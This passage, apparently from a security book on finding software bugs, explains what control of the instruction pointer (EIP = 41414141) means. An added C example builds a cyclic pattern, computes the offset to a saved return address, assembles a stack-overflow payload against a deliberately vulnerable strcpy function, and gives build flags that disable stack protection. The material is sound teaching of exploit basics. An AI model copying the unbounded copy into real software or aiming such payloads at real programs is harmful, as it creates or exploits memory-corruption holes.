1.5 EIP = 41414141

Note

Instruction pointer/Program counter:

  • EIP—32-bit instruction pointer (IA-32)

  • RIP—64-bit instruction pointer (Intel 64)

  • R15 or PC—ARM architecture as used on Apple’s iPhone

To illustrate the security implications of the bugs that I found, I will discuss the steps needed to gain control of the execution flow of the vulnerable program by controlling the instruction pointer (IP) of the CPU. The instruction pointer or program counter (PC) register contains the offset in the current code segment for the next instruction to be executed.[5] If you gain control of this register, you fully control the execution flow of the vulnerable process. To demonstrate instruction pointer control, I will modify the register to values like 0x41414141 (hexadecimal representation of ASCII “AAAA”), 0x41424344 (hexadecimal representation of ASCII “ABCD”), or something similar. So if you see EIP = 41414141 in the following chapters, it means that I’ve gained control of the vulnerable process.
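The following is an added example (not code from the book) of the two steps that sit behind a line like EIP = 41414141: finding how far into the input the saved return address lies, and then placing chosen bytes there. It assumes IA-32, which is little-endian, so the four bytes that end up in EIP are read least-significant byte first: "AAAA" gives 0x41414141 either way, but the value 0x41424344 (ASCII "ABCD") is produced by the bytes "DCBA" in the input. The cyclic pattern is the Metasploit-style "Aa0Aa1..." sequence, in which every 4-byte window is unique; the 64-byte buffer and the crash value 0x41366241 are constructed for the illustration, not taken from any of the bugs discussed here, and the distance to the return address is always something to measure in the debugger rather than assume.

```c
/* Added example: from an observed EIP value back to the input offset, and
 * from a chosen value to the payload bytes. IA-32 (little-endian) assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Interpret 4 input bytes the way `ret` pops them into EIP on IA-32.
 * "AAAA" -> 0x41414141, "DCBA" -> 0x41424344. */
uint32_t bytes_to_eip(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Inverse: serialize `target` so that it lands in EIP unchanged. */
void eip_to_bytes(uint32_t target, unsigned char *out)
{
    out[0] = (unsigned char)(target & 0xff);
    out[1] = (unsigned char)((target >> 8) & 0xff);
    out[2] = (unsigned char)((target >> 16) & 0xff);
    out[3] = (unsigned char)(target >> 24);
}

/* Cyclic pattern "Aa0Aa1Aa2...": no 4-byte window repeats, so the value
 * seen in EIP at the crash identifies the offset that reached it.
 * Writes n bytes plus a NUL; the caller provides n + 1 bytes. */
size_t pattern_create(char *out, size_t n)
{
    size_t i = 0;
    for (int u = 'A'; u <= 'Z' && i < n; u++)
        for (int l = 'a'; l <= 'z' && i < n; l++)
            for (int d = '0'; d <= '9' && i < n; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int k = 0; k < 3 && i < n; k++)
                    out[i++] = trip[k];
            }
    out[i] = '\0';
    return i;
}

/* Offset in the pattern whose bytes produced `eip`, or -1 if not found. */
long pattern_offset(const char *pat, size_t n, uint32_t eip)
{
    unsigned char want[4];
    eip_to_bytes(eip, want);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, want, 4) == 0)
            return (long)i;
    return -1;
}

/* Overflow string: `pad` filler bytes up to the saved return address, the
 * 4-byte value that should become EIP, then a NUL so strcpy() carries it.
 * `pad` (buffer + saved EBP + any alignment) is measured, never guessed. */
size_t build_payload(unsigned char *out, size_t cap, size_t pad, uint32_t target)
{
    if (cap < pad + 4 + 1)
        return 0;
    memset(out, 'A', pad);
    eip_to_bytes(target, out + pad);
    out[pad + 4] = '\0';
    return pad + 4;
}

/* Deliberately vulnerable: the classic unbounded copy into a stack buffer.
 * It is only ever called under a debugger; it is not run from main(). */
void vuln(const char *input)
{
    char buf[64];
    strcpy(buf, input);
}

int main(void)
{
    char pat[201];
    unsigned char payload[128];
    long off;

    pattern_create(pat, 200);
    /* Step 1 happens in the debugger: vuln(pat) crashes. Suppose it reports
     * EIP = 0x41366241, i.e. the bytes "Ab6A" (constructed value). */
    off = pattern_offset(pat, 200, 0x41366241u);
    printf("EIP=41366241 came from pattern offset %ld\n", off);

    /* Step 2: put the bytes we want at exactly that offset. */
    build_payload(payload, sizeof payload, (size_t)off, 0x41414141u);
    printf("return-address slot now reads %08x\n", bytes_to_eip(payload + off));
    /* vuln((const char *)payload);  -- would fault with EIP = 41414141 */
    return 0;
}
```

Build it as a 32-bit binary with the stack protector and PIE disabled if you want to watch the fault itself; with those mitigations on, the same overflow aborts before `ret` or lands at an address that is not simply your four bytes, which is the first check to make when EIP does not read 41414141 as expected.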

Once you achieve control over the instruction pointer, there are many ways to turn it into a fully working, weaponized exploit. For more information on the process of exploit development, you can refer to Jon Erickson’s Hacking: The Art of Exploitation, 2nd edition (No Starch Press, 2008), or you can type exploit writing into Google and browse through the enormous amount of material available online.
